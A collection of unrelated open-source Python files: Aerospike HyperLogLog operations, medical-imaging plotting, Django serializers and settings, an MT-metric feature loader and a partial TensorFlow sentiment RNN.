ops = [hll_ops.hll_get_intersect_count("viewed", viewed)]
try:
_, _, res = client.operate(customer_record_keys[0], ops)
except ex.ClientError as e:
print("Error: {0} [{1}]".format(e.msg, e.code))
sys.exit(1)
print(
"Estimated items viewed intersection: %d."
% res["viewed"]
)
print("Actual intersection: 250.\\n")
# Find out how many unique products Amy, Farnsworth, and Scruffy have viewed.
Farnsworth_viewed = client.get(customer_record_keys[1])[2]["viewed"]
Scruffy_viewed = client.get(customer_record_keys[2])[2]["viewed"]
viewed = [Farnsworth_viewed, Scruffy_viewed]
ops = [hll_ops.hll_get_union_count("viewed", viewed)]
try:
_, _, res = client.operate(customer_record_keys[0], ops)
except ex.ClientError as e:
print("Error: {0} [{1}]".format(e.msg, e.code))
sys.exit(1)
print(
"Estimated items viewed union: %d."
% res["viewed"]
)
print("Actual union: 1000.\\n")
# Find the similarity of Amy, Farnsworth, and Scruffy's product views.
Farnsworth_viewed = client.get(customer_record_keys[1])[2]["viewed"]
Scruffy_viewed = client.get(customer_record_keys[2])[2]["viewed"]
viewed = [Farnsworth_viewed, Scruffy_viewed]
ops = [hll_ops.hll_get_similarity("viewed", viewed)]
try:
_, _, res = client.operate(customer_record_keys[0], ops)
except ex.ClientError as e:
print("Error: {0} [{1}]".format(e.msg, e.code))
sys.exit(1)
print(
"Estimated items viewed similarity: %f%%."
% (res["viewed"] * 100)
)
print("Actual similarity: 25%.")
"""
Expected output:
Estimated items viewed intersection: 235.
Actual intersection: 250.
Estimated items viewed union: 922.
Actual union: 1000.
Estimated items viewed similarity: 25.488069%.
Actual similarity: 25%.
"""
'''
import aerospike
OP_KEY = "op"
BIN_KEY = "bin"
HLL_POLICY_KEY = "hll_policy"
INDEX_BIT_COUNT_KEY = "index_bit_count"
MH_BIT_COUNT_KEY = "mh_bit_count"
VALUE_LIST_KEY = "value_list"
def hll_add(bin_name, values, index_bit_count=None, mh_bit_count=None, policy=None):
"""Creates a hll_add operation to be used with operate, or operate_ordered.
Server will add the values to the hll bin.
If the HLL bin does not exist, it will be created with index_bit_count and/or mh_bit_count if they have been supplied.
Args:
bin_name (str): The name of the bin to be operated on.
values: The values to be added to the HLL set.
index_bit_count: An optional number of index bits. Must be bewtween 4 and 16 inclusive.
mh_bit_count: An optional number of min hash bits. Must be bewtween 4 and 58 inclusive.
policy (dict): An optional dictionary of :ref:`hll policy options <aerospike_hll_policies>`.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_ADD,
BIN_KEY: bin_name,
VALUE_LIST_KEY: values,
INDEX_BIT_COUNT_KEY: -1 if index_bit_count is None else index_bit_count,
MH_BIT_COUNT_KEY: -1 if mh_bit_count is None else mh_bit_count
}
if policy:
op_dict[HLL_POLICY_KEY] = policy
return op_dict
def hll_describe(bin_name):
"""Creates a hll_describe operation to be used with operate, or operate_ordered.
Server returns index and minhash bit counts used to create HLL bin in a list of integers.
The list size is 2.
Args:
bin_name (str): The name of the bin to be operated on.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_DESCRIBE,
BIN_KEY: bin_name,
}
return op_dict
def hll_fold(bin_name, index_bit_count):
"""Creates a hll_fold operation to be used with operate, or operate_ordered.
Servers folds index_bit_count to the specified value.
This can only be applied when minhash bit count on the HLL bin is 0.
Server does not return a value.
Args:
bin_name (str): The name of the bin to be operated on.
index_bit_count: number of index bits. Must be bewtween 4 and 16 inclusive.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_FOLD,
BIN_KEY: bin_name,
INDEX_BIT_COUNT_KEY: index_bit_count
}
return op_dict
def hll_get_count(bin_name):
"""Creates a hll_get_count operation to be used with operate, or operate_ordered.
Server returns estimated count of elements in the HLL bin.
Args:
bin_name (str): The name of the bin to be operated on.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_GET_COUNT,
BIN_KEY: bin_name,
}
return op_dict
def hll_get_intersect_count(bin_name, hll_list):
"""Creates a hll_get_intersect_count operation to be used with operate, or operate_ordered.
Server returns estimate of elements that would be contained by the intersection of these HLL objects.
Args:
bin_name (str): The name of the bin to be operated on.
hll_list (list): The HLLs to be intersected.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_GET_INTERSECT_COUNT,
BIN_KEY: bin_name,
VALUE_LIST_KEY: hll_list
}
return op_dict
def hll_get_similarity(bin_name, hll_list):
"""Creates a hll_get_similarity operation to be used with operate, or operate_ordered.
Server returns estimated similarity of the HLL objects.
Server returns a float.
Args:
bin_name (str): The name of the bin to be operated on.
hll_list (list): The HLLs used for similarity estimation.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_GET_SIMILARITY,
BIN_KEY: bin_name,
VALUE_LIST_KEY: hll_list
}
return op_dict
def hll_get_union(bin_name, hll_list):
"""Creates a hll_get_union operation to be used with operate, or operate_ordered.
Server returns an HLL object that is the union of all specified HLL objects
in hll_list with the HLL bin.
Args:
bin_name (str): The name of the bin to be operated on.
hll_list (list): The HLLs to be unioned.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_GET_UNION,
BIN_KEY: bin_name,
VALUE_LIST_KEY: hll_list
}
return op_dict
def hll_get_union_count(bin_name, hll_list):
"""Creates a hll_get_union_count operation to be used with operate, or operate_ordered.
Server returns the estimated count of elements that would be contained by the union of all specified HLL objects
in the list with the HLL bin.
Args:
bin_name (str): The name of the bin to be operated on.
hll_list (list): The HLLs to be unioned.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_GET_UNION_COUNT,
BIN_KEY: bin_name,
VALUE_LIST_KEY: hll_list
}
return op_dict
def hll_init(bin_name, index_bit_count=None, mh_bit_count=None, policy=None):
"""Creates a hll_init operation to be used with operate, or operate_ordered.
Server creates a new HLL or resets an existing HLL.
If index_bit_count and mh_bit_count are None, an existing HLL bin will be reset but retain its configuration.
If 1 of index_bit_count or mh_bit_count are set,
an existing HLL bin will set that config and retain its current value for the unset config.
If the HLL bin does not exist, index_bit_count is required to create it, mh_bit_count is optional.
Server does not return a value.
Args:
bin_name (str): The name of the bin to be operated on.
index_bit_count: An optional number of index bits. Must be bewtween 4 and 16 inclusive.
mh_bit_count: An optional number of min hash bits. Must be bewtween 4 and 58 inclusive.
policy (dict): An optional dictionary of :ref:`hll policy options <aerospike_hll_policies>`.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_INIT,
BIN_KEY: bin_name,
INDEX_BIT_COUNT_KEY: -1 if index_bit_count is None else index_bit_count,
MH_BIT_COUNT_KEY: -1 if mh_bit_count is None else mh_bit_count
}
if policy:
op_dict[HLL_POLICY_KEY] = policy
return op_dict
def hll_refresh_count(bin_name):
"""Creates a hll_refresh_count operation to be used with operate, or operate_ordered.
Server updates the cached count if it is stale.
Server returns the count.
Args:
bin_name (str): The name of the bin to be operated on.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_REFRESH_COUNT,
BIN_KEY: bin_name,
}
return op_dict
def hll_set_union(bin_name, hll_list, policy=None):
"""Creates a hll_set_union operation to be used with operate, or operate_ordered.
Server sets the union of all specified HLL objects with the HLL bin.
Server returns nothing.
Args:
bin_name (str): The name of the bin to be operated on.
hll_list (list): The HLLs who's union will be set.
policy (dict): An optional dictionary of :ref:`hll policy options <aerospike_hll_policies>`.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_SET_UNION,
BIN_KEY: bin_name,
VALUE_LIST_KEY: hll_list
}
if policy:
op_dict[HLL_POLICY_KEY] = policy
return op_dict
|
StarcoderdataPython
|
5142882
|
"""
<NAME>
University of Manitoba
September 10th, 2021
"""
import os
import numpy as np
import matplotlib.pyplot as plt
from umbms import get_proj_path, verify_path
from umbms.loadsave import load_pickle
###############################################################################
__OUT_DIR = os.path.join(get_proj_path(), 'output/g3/diagnostic-figs/')
verify_path(__OUT_DIR)
# Define RGB colors for plotting
das_col = [0, 0, 0]
dmas_col = [80, 80, 80]
orr_col = [160, 160, 160]
das_col = [ii / 255 for ii in das_col]
dmas_col = [ii / 255 for ii in dmas_col]
orr_col = [ii / 255 for ii in orr_col]
###############################################################################
def plt_adi_ref_performance():
"""Plot the diagnostic performance when adipose-only used as ref
"""
# Define x-coords for bars
das_xs = [0, 3.5]
dmas_xs = [1, 4.5]
orr_xs = [2, 5.5]
# Init plot
plt.figure(figsize=(12, 6))
plt.rc('font', family='Times New Roman')
plt.tick_params(labelsize=20)
# Plot DAS sensitivity and specificity
plt.bar(das_xs,
height=[das_sens[0], das_spec],
width=0.75,
linewidth=1,
color=das_col,
edgecolor='k',
label='DAS')
# Plot DMAS sensitivity and specificity
plt.bar(dmas_xs,
height=[dmas_sens[0], dmas_spec],
width=0.75,
capsize=10,
linewidth=1,
color=dmas_col,
edgecolor='k',
label='DMAS')
# Plot
plt.bar(orr_xs,
height=[orr_sens[0], orr_spec],
width=0.75,
capsize=10,
linewidth=1,
color=orr_col,
edgecolor='k',
label='ORR')
plt.legend(fontsize=18,
loc='upper left',
framealpha=0.95)
plt.xticks([1, 4.5],
["Sensitivity", "Specificity"],
size=20)
plt.ylabel('Metric Value (%)', fontsize=22)
# Put text on the bars
das_text_ys = [15, 40]
das_for_text = [das_sens[0], das_spec]
dmas_text_ys = [16, 36]
dmas_for_text = [dmas_sens[0], dmas_spec]
gd_text_ys = [23, 52]
gd_for_text = [orr_sens[0], orr_spec]
for ii in range(len(das_text_ys)):
plt.text(das_xs[ii], das_text_ys[ii],
"%d" % das_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
for ii in range(len(dmas_text_ys)):
plt.text(dmas_xs[ii], dmas_text_ys[ii],
"%d" % dmas_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
for ii in range(len(gd_text_ys)):
plt.text(orr_xs[ii], gd_text_ys[ii],
"%d" % gd_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
# Set appropriate y-limit
plt.ylim([0, 100])
plt.tight_layout() # Make everything fit nicely
plt.show() # Display the plot
# Save the figure
plt.savefig(os.path.join(__OUT_DIR, 'sens_spec_adi_refs.png'),
dpi=300, transparent=False)
def plt_fib_ref_performance():
"""Plot the diagnostic performance when healthy scan as reference
"""
# Define x-coords for bars
das_xs = [0, 3.5]
dmas_xs = [1, 4.5]
orr_xs = [2, 5.5]
# Init fig
plt.figure(figsize=(12, 6))
plt.rc('font', family='Times New Roman')
plt.tick_params(labelsize=20)
plt.bar(das_xs,
height=[das_sens[1], das_spec],
width=0.75,
linewidth=1,
color=das_col,
edgecolor='k',
label='DAS')
plt.bar(dmas_xs,
height=[dmas_sens[1], dmas_spec],
width=0.75,
capsize=10,
linewidth=1,
color=dmas_col,
edgecolor='k',
label='DMAS')
plt.bar(orr_xs,
height=[orr_sens[1], orr_spec],
width=0.75,
capsize=10,
linewidth=1,
color=orr_col,
edgecolor='k',
label='ORR')
plt.legend(fontsize=18,
loc='upper left',
framealpha=0.95)
plt.xticks([1, 4.5],
["Sensitivity", "Specificity"],
size=20)
plt.ylabel('Metric Value (%)', fontsize=22)
# Put text on the bars
das_text_ys = [67, 40]
das_for_text = [das_sens[1], das_spec]
dmas_text_ys = [74, 36]
dmas_for_text = [dmas_sens[1], dmas_spec]
gd_text_ys = [78, 52]
gd_for_text = [orr_sens[1], orr_spec]
for ii in range(len(das_text_ys)):
plt.text(das_xs[ii], das_text_ys[ii],
"%d" % das_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
for ii in range(len(dmas_text_ys)):
plt.text(dmas_xs[ii], dmas_text_ys[ii],
"%d" % dmas_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
for ii in range(len(gd_text_ys)):
plt.text(orr_xs[ii], gd_text_ys[ii],
"%d" % gd_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
# Set appropriate y-limit
plt.ylim([0, 100])
plt.tight_layout() # Make everything fit nicely
plt.show() # Display the plot
# Save fig
plt.savefig(os.path.join(__OUT_DIR, 'sens_spec_fib_refs.png'),
dpi=300, transparent=False)
def plt_sens_by_tum_adi():
"""Plot sensitivity as a function of tumour size with adi refs
"""
# Define x-coords of bars
das_xs = [0, 3.5, 7, 10.5, 14]
dmas_xs = [1, 4.5, 8, 11.5, 15]
orr_xs = [2, 5.5, 9, 12.5, 16]
# Init fig
plt.figure(figsize=(12, 6))
plt.rc('font', family='Times New Roman')
plt.tick_params(labelsize=20)
plt.bar(das_xs,
height=das_by_tum_adi,
width=0.75,
linewidth=1,
color=das_col,
edgecolor='k',
label='DAS')
plt.bar(dmas_xs,
height=dmas_by_tum_adi,
width=0.75,
capsize=10,
linewidth=1,
color=dmas_col,
edgecolor='k',
label='DMAS')
plt.bar(orr_xs,
height=orr_by_tum_adi,
width=0.75,
capsize=10,
linewidth=1,
color=orr_col,
edgecolor='k',
label='ORR')
plt.legend(fontsize=18,
loc='upper left',
framealpha=0.95)
plt.xticks(dmas_xs,
["30", "25", "20", "15", "10"],
size=20)
plt.ylabel('Sensitivity (%)', fontsize=22)
plt.xlabel('Tumour Diameter (mm)', fontsize=22)
# Put text on the fig
das_text_ys = np.array(das_by_tum_adi) - 4
das_text_ys[np.array(das_by_tum_adi) == 0] = 4
das_for_text = das_by_tum_adi
dmas_text_ys = np.array(dmas_by_tum_adi) - 4
dmas_text_ys[np.array(dmas_by_tum_adi) == 0] = 4
dmas_for_text = dmas_by_tum_adi
orr_text_ys = np.array(orr_by_tum_adi) - 4
orr_text_ys[np.array(orr_by_tum_adi) == 0] = 4
orr_for_text = orr_by_tum_adi
for ii in range(len(das_text_ys)):
plt.text(das_xs[ii], das_text_ys[ii],
"%d" % das_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
for ii in range(len(dmas_text_ys)):
plt.text(dmas_xs[ii], dmas_text_ys[ii],
"%d" % dmas_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
for ii in range(len(orr_text_ys)):
plt.text(orr_xs[ii], orr_text_ys[ii],
"%d" % orr_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
# Set appropriate y-limit
plt.ylim([0, 100])
plt.tight_layout() # Make everything fit nicely
plt.show() # Display the plot
# Save fig
plt.savefig(os.path.join(__OUT_DIR, 'sens_by_tum_adi.png'),
dpi=300, transparent=False)
def plt_sens_by_tum_fib():
"""Plot sensitivity vs tumour size when healthy scan used as refs
"""
# Define x-coords for bars
das_xs = [0, 3.5, 7, 10.5, 14]
dmas_xs = [1, 4.5, 8, 11.5, 15]
orr_xs = [2, 5.5, 9, 12.5, 16]
# Init fig
plt.figure(figsize=(12, 6))
plt.rc('font', family='Times New Roman')
plt.tick_params(labelsize=20)
# Plot bars
plt.bar(das_xs,
height=das_by_tum_fib,
width=0.75,
linewidth=1,
color=das_col,
edgecolor='k',
label='DAS')
plt.bar(dmas_xs,
height=dmas_by_tum_fib,
width=0.75,
capsize=10,
linewidth=1,
color=dmas_col,
edgecolor='k',
label='DMAS')
plt.bar(orr_xs,
height=orr_by_tum_fib,
width=0.75,
capsize=10,
linewidth=1,
color=orr_col,
edgecolor='k',
label='ORR')
plt.legend(fontsize=18,
loc='upper right',
framealpha=0.95)
plt.xticks(dmas_xs,
["30", "25", "20", "15", "10"],
size=20)
plt.ylabel('Sensitivity (%)', fontsize=22)
plt.xlabel('Tumour Diameter (mm)', fontsize=22)
das_text_ys = np.array(das_by_tum_fib) - 4
das_text_ys[np.array(das_by_tum_fib) == 0] = 4
das_for_text = das_by_tum_fib
dmas_text_ys = np.array(dmas_by_tum_fib) - 4
dmas_text_ys[np.array(dmas_by_tum_fib) == 0] = 4
dmas_text_ys[np.array(dmas_by_tum_fib) == 5] = 5
dmas_for_text = dmas_by_tum_fib
gd_text_ys = np.array(orr_by_tum_fib) - 4
gd_text_ys[np.array(orr_by_tum_fib) == 0] = 4
gd_for_text = orr_by_tum_fib
for ii in range(len(das_text_ys)):
plt.text(das_xs[ii], das_text_ys[ii],
"%d" % das_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
for ii in range(len(dmas_text_ys)):
plt.text(dmas_xs[ii], dmas_text_ys[ii],
"%d" % dmas_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
for ii in range(len(gd_text_ys)):
plt.text(orr_xs[ii], gd_text_ys[ii],
"%d" % gd_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
# Set appropriate y-limit
plt.ylim([0, 100])
plt.tight_layout() # Make everything fit nicely
plt.show() # Display the plot
plt.savefig(os.path.join(__OUT_DIR, 'sens_by_tum_fib.png'),
dpi=300, transparent=False)
###############################################################################
if __name__ == "__main__":
# Load the sensitivities for adipose/adipose-fibroglandular
# reference subtraction
das_adi_sens, dmas_adi_sens, orr_adi_sens = \
(load_pickle(
os.path.join(get_proj_path(), 'output/g3/',
'adi_sensitivities_at_target_threshold.pickle')))
das_fib_sens, dmas_fib_sens, orr_fib_sens = \
load_pickle(
os.path.join(get_proj_path(), 'output/g3/',
'fib_sensitivities_at_target_threshold.pickle'))
# Load the specificities
das_spec, dmas_spec, orr_spec = \
(load_pickle(
os.path.join(get_proj_path(), 'output/g3/',
'adi_specificities_at_target_threshold.pickle')))
# Define tuples for plots
das_sens = das_adi_sens, das_fib_sens
dmas_sens = dmas_adi_sens, dmas_fib_sens
orr_sens = orr_adi_sens, orr_fib_sens
# Load sensitivities as a function of tumour size
das_by_tum_adi, dmas_by_tum_adi, orr_by_tum_adi = \
load_pickle(os.path.join(get_proj_path(), 'output/g3/',
'adi_sens_by_tums.pickle'))
das_by_tum_fib, dmas_by_tum_fib, orr_by_tum_fib = \
load_pickle(os.path.join(get_proj_path(), 'output/g3/',
'fib_sens_by_tums.pickle'))
# Plot diagnostic performance when adipose and
# adipose-fibroglandular scans used as reference
plt_fib_ref_performance()
plt_adi_ref_performance()
# Plot sensitivity as a function of tumour size when adipose
# scans used as references
plt_sens_by_tum_adi()
plt_sens_by_tum_fib()
|
StarcoderdataPython
|
1817318
|
<filename>messdiener/serializers.py
from rest_framework import serializers
from .models import *
class LocationSerializer(serializers.ModelSerializer):
class Meta:
model = Location
fields = ('id', 'locationName')
class RoleSerializer(serializers.ModelSerializer):
class Meta:
model = Role
fields = ('id', 'roleName')
class ClassificationSerializer(serializers.ModelSerializer):
def create(self, validated_data):
group = Group.objects.get(pk=self.context['view'].kwargs['group_pk'])
validated_data['group'] = group
return Classification.objects.create(**validated_data)
class Meta:
model = Classification
fields = ('id', 'ageFrom', 'ageTo')
class GroupSerializer(serializers.ModelSerializer):
classifications = ClassificationSerializer(many=True, read_only=True)
class Meta:
model = Group
fields = ('id', 'groupName', 'classifications')
class RequirementSerializer(serializers.ModelSerializer):
def create(self, validated_data):
type = Type.objects.get(pk=self.context['view'].kwargs['type_pk'])
requirement = Requirement.objects.create(type=type, quantity=validated_data['quantity'],
role=validated_data['role'])
requirement.classifications.set(validated_data['classifications'])
return requirement
class Meta:
model = Requirement
fields = ('id', 'quantity', 'role', 'classifications')
class RuleSerializer(serializers.ModelSerializer):
def create(self, validated_data):
type = Type.objects.get(pk=self.context['view'].kwargs['type_pk'])
validated_data['type'] = type
return Rule.objects.create(**validated_data)
class Meta:
model = Rule
fields = ('id', 'location', 'time', 'dayOfWeek')
class TypeSerializer(serializers.ModelSerializer):
requirements = RequirementSerializer(many=True, read_only=True)
rules = RuleSerializer(many=True, read_only=True)
class Meta:
model = Type
fields = ('id', 'typeName', 'requirements', 'rules')
class AcolyteSerializer(serializers.ModelSerializer):
class Meta:
model = Acolyte
fields = ('id', 'firstName', 'lastName', 'extra', 'birthday', 'group', 'inactive')
class CreateRequirementClassificationSerializer(serializers.ModelSerializer):
class Meta:
model = Classification
fields = ('id',)
class PlanSerializer(serializers.ModelSerializer):
class Meta:
model = Plan
fields = ('id', 'dateFrom', 'dateTo', 'public')
class MassSerializer(serializers.ModelSerializer):
def create(self, validated_data):
plan = Plan.objects.get(pk=self.context['view'].kwargs['plan_pk'])
validated_data['plan'] = plan
return Mass.objects.create(**validated_data)
class Meta:
model = Mass
fields = ('id', 'time', 'extra', 'location', 'type', 'canceled')
class AcolyteMassSerializer(serializers.ModelSerializer):
class Meta:
model = MassAcolyteRole
fields = ('id', 'mass', 'role')
class MassAcolyteSerializer(serializers.ModelSerializer):
def create(self, validated_data):
mass = Mass.objects.get(pk=self.context['view'].kwargs['mass_pk'])
validated_data['mass'] = mass
return MassAcolyteRole.objects.create(**validated_data)
class Meta:
model = MassAcolyteRole
fields = ('id', 'acolyte', 'role')
write_only_fields = ('mass',)
class CurrentPlanAcolyteSerializer(serializers.ModelSerializer):
class Meta:
model = Acolyte
fields = ('firstName', 'lastName', 'extra',)
class AcolyteRoleSerializer(serializers.ModelSerializer):
role = serializers.SlugRelatedField(
many=False,
read_only=True,
slug_field='roleName'
)
acolyte = CurrentPlanAcolyteSerializer(many=False)
class Meta:
model = MassAcolyteRole
fields = ('role', 'acolyte')
class CurrentPlanSerializer(serializers.ModelSerializer):
acolytes = serializers.SerializerMethodField()
location = serializers.SlugRelatedField(
many=False,
read_only=True,
slug_field='locationName'
)
class Meta:
model = Mass
fields = ('time', 'extra', 'location', 'canceled', 'acolytes')
def get_acolytes(self, obj):
queryset = MassAcolyteRole.objects.filter(mass=obj)
return AcolyteRoleSerializer(queryset, many=True).data
|
StarcoderdataPython
|
386878
|
"""
Django settings for hc project.
Generated by 'django-admin startproject' using Django 1.8.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
import logging
import os
import cssutils
import dj_database_url
cssutils.log.setLevel(logging.CRITICAL)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
HOST = os.environ.get("HOST", "localhost")
SECRET_KEY = os.environ.get("SECRET_KEY", "---")
DEBUG = os.environ.get("DEBUG", "t").lower().startswith("t")
ALLOWED_HOSTS = [HOST]
ALLOWED_DOMAIN = os.environ.get("ALLOWED_DOMAIN")
DEFAULT_FROM_EMAIL = os.environ.get(
'DEFAULT_FROM_EMAIL', '<EMAIL>')
USE_PAYMENTS = False
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.humanize',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'compressor',
'djmail',
'hc.accounts',
'hc.api',
'hc.front',
'hc.payments'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.middleware.gzip.GZipMiddleware',
'hc.accounts.middleware.TeamAccessMiddleware',
)
AUTHENTICATION_BACKENDS = (
'hc.accounts.backends.EmailBackend',
'hc.accounts.backends.ProfileBackend'
)
ROOT_URLCONF = 'hc.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'hc.payments.context_processors.payments'
],
},
},
]
WSGI_APPLICATION = 'hc.wsgi.application'
TEST_RUNNER = 'hc.api.tests.CustomRunner'
# Default database engine is SQLite. So one can just check out code,
# install requirements.txt and do manage.py runserver and it works
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': './hc.sqlite',
}
}
if 'DATABASE_URL' in os.environ:
DATABASES['default'] = dj_database_url.config()
# You can switch database engine to postgres or mysql using environment
# variable 'DB'. Travis CI does this.
if os.environ.get("DB") == "postgres":
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'hc',
'USER': 'postgres',
'TEST': {'CHARSET': 'UTF8'}
}
}
if os.environ.get("DB") == "mysql":
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'USER': 'root',
'NAME': 'hc',
'TEST': {'CHARSET': 'UTF8'}
}
}
LANGUAGE_CODE = 'en-us'
TIME_ZONE = os.environ.get('TIME_ZONE', 'UTC')
USE_I18N = True
USE_L10N = True
USE_TZ = True
SESSION_ENGINE = "django.contrib.sessions.backends.signed_cookies"
PASSWORD_HASHERS = ('django.contrib.auth.hashers.MD5PasswordHasher',)
SITE_ROOT = os.environ.get("SITE_ROOT", "http://localhost:8000")
PING_ENDPOINT = SITE_ROOT + "/ping/"
PING_EMAIL_DOMAIN = HOST
STATIC_URL = '/static/'
STATICFILES_DIRS = [os.path.join(BASE_DIR, "static")]
STATIC_ROOT = os.path.join(BASE_DIR, 'static-collected')
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
COMPRESS_ENABLED = True
COMPRESS_OFFLINE = False
EMAIL_BACKEND = "djmail.backends.async.EmailBackend"
if 'POSTMARK_API_KEY' in os.environ:
POSTMARK_API_KEY = os.environ['POSTMARK_API_KEY']
POSTMARK_SENDER = DEFAULT_FROM_EMAIL
POSTMARK_TRACK_OPENS = True
DJMAIL_REAL_BACKEND = 'postmark.django_backend.EmailBackend'
# Pushover integration
PUSHOVER_API_TOKEN = None
PUSHOVER_SUBSCRIPTION_URL = None
PUSHOVER_EMERGENCY_RETRY_DELAY = 300
PUSHOVER_EMERGENCY_EXPIRATION = 86400
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler'
}
},
'loggers': {
'django': {
'handlers': ['console']
},
'djmail': {
'handlers': ['console']
},
'py.warnings': {
'handlers': ['console'],
'level': 'ERROR'
}
},
}
|
StarcoderdataPython
|
1919079
|
<reponame>alvations/USAAR-SemEval-2015
#!/usr/bin/env python -*- coding: utf-8 -*-
import io, os
from itertools import chain
import numpy as np
indir = 'Asiya-outputs/'
def get_asiya_scores():
feature_data = {}
for infile in os.listdir(indir):
if not infile.startswith('features'):
continue
if infile in ['features.cp', 'features.sr', 'features.ne',
'features.esa']:
continue
data = [[float(i) for i in line.strip().split()]
for line in io.open(indir+infile, 'r')]
feature_data[infile] = data
_seventy_seven = [i + j + k for i,j,k in
zip(feature_data['features.meteor'],
feature_data['features.sp'],
feature_data['features.ngram'])]
seventy_seven = []
to_remove = []
for i,j in enumerate(_seventy_seven):
if len(j) != 76:
to_remove.append(i)
else:
seventy_seven.append(j)
return seventy_seven, to_remove
def get_asiya_test_scores():
feature_data = {}
for infile in os.listdir(indir):
if not infile.startswith('features.test'):
continue
if infile not in ['features.test.meteor', 'features.test.sp',
'features.test.ngram']:
continue
data = [[float(i) for i in line.strip().split()]
for line in io.open(indir+infile, 'r')]
feature_data[infile] = data
_seventy_seven = [i + j + k for i,j,k in
zip(feature_data['features.test.meteor'],
feature_data['features.test.sp'],
feature_data['features.test.ngram'])]
return _seventy_seven
for i,j in enumerate(_seventy_seven):
print i, len(j), j
assert len(j) == 76
#def get_asiya_scores_for_test():
'''
indir = 'Asiya-outputs/'
feature_data = {}
for infile in os.listdir(indir):
if not infile.startswith('report'):
continue
if infile not in ['report.test.meteor', 'report.test.sp',
'report.test.ngram']:
continue
for line in io.open(indir+infile, 'r'):
print infile, line.split()
break
data = [[float(i) for i in line.strip().split()]
for line in io.open(indir+infile, 'r')]
feature_data[infile] = data
for line in data:
print len(line), line
'''
|
StarcoderdataPython
|
5133925
|
from __future__ import division
import os
import time
from glob import glob
import tensorflow as tf
import numpy as np
from six.moves import xrange
import random
import utils
from ops import *
class SentimentRNN(object):
def __init__(self, sess, vocab_size, n_classes, batch_size,
keep_prob, max_length, n_recurrent_layers, n_fc_layers,
recurrent_layer_width, fc_layer_width, checkpoint_dir, epoch):
"""Inits variables, builds model"""
self.sess = sess
self.vocab_size = vocab_size
self.n_classes = n_classes
self.batch_size = batch_size
self.max_length = max_length
self.n_recurrent_layers = n_recurrent_layers
self.n_fc_layers = n_fc_layers
self.recurrent_layer_width = recurrent_layer_width
self.fc_layer_width = fc_layer_width
self.checkpoint_dir = checkpoint_dir
self.epoch = epoch
self.build_model()
def build_model(self):
"""Builds model and creates loss functions"""
# X is our input data, a tensor of sentences
# where each sentence is a list of 1-hot encodings of words
# will be like [[[0, 0, 1, 0...], [1, 0, 1, 0...]...],[...]]
self.X = tf.placeholder(tf.float32, [None, self.max_length, self.vocab_size])
# y is our labels
# will be like [[1, 0, 0], [0, 0, 1]]
self.y = tf.placeholder(tf.float32, [None, self.n_classes], name='y')
# Set up keep prob placeholder variable
self.keep_prob = tf.placeholder(tf.float32, name='keep_prob')
# logits is our predictions
# will be like [[1, 0, 0], [0, 0, 1]]
self.logits = self.rnn_simple_model(self.X, self.y)
# Construct loss function (mean of all cross-entropy losses)
